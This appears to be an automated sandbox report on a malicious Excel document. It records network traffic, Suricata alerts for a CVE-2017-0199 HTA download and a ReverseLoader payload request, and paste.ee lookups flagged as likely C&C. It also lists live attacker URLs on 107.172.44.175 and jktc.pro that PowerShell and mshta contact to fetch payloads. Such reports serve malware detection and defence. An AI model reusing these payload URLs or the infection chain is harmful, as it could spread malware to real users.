Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 107.172.44.175:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.175:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.175:80 -> 192.168.2.22:49162

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Source: Joe Sandbox View	IP Address: 172.67.163.184 172.67.163.184
Source: Joe Sandbox View	IP Address: 107.172.44.175 107.172.44.175

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.172.44.175:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.172.44.175:80

Source: global traffic	HTTP traffic detected: GET /yyKnY4?&blow=cold&peacoat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yyKnY4?&blow=cold&peacoat HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 107.172.44.175If-Range: "14278-6290f34dfc8a9"
Source: global traffic	HTTP traffic detected: GET /73/simplecookiebiscutwithsweetnessforentiretime.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_000007FE89867018 URLDownloadToFileW,

7_2_000007FE89867018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9221B01.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /yyKnY4?&blow=cold&peacoat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yyKnY4?&blow=cold&peacoat HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 107.172.44.175If-Range: "14278-6290f34dfc8a9"
Source: global traffic	HTTP traffic detected: GET /73/simplecookiebiscutwithsweetnessforentiretime.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive

Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: jktc.pro
Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee

Source: mshta.exe, 00000004.00000003.488493466.0000000003417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.0000000003417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.0000000003417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.0000000003417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/
Source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/simplec
Source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF
Source: powershell.exe, 00000007.00000002.511162512.000000001C8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF9
Source: powershell.exe, 00000007.00000002.511162512.000000001C8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIFC:
Source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIFp
Source: mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491655612.0000000003439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta
Source: mshta.exe, 00000004.00000003.485939637.0000000000512000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta...M
Source: mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta5
Source: mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta6
Source: mshta.exe, 00000004.00000003.485939637.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491168504.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaept-C:
Source: mshta.exe, 00000004.00000003.487927328.00000000028B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htahttp://10
Source: mshta.exe, 00000004.00000003.486726361.0000000003439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491655612.0000000003439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaj5
Source: mshta.exe, 00000004.00000003.486726361.0000000003439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491655612.0000000003439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htap5
Source: mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C8F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.000000000226E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000C.00000002.557064924.00000000022C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entr
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.510544672.000000001A8FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.506734077.00000000028F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
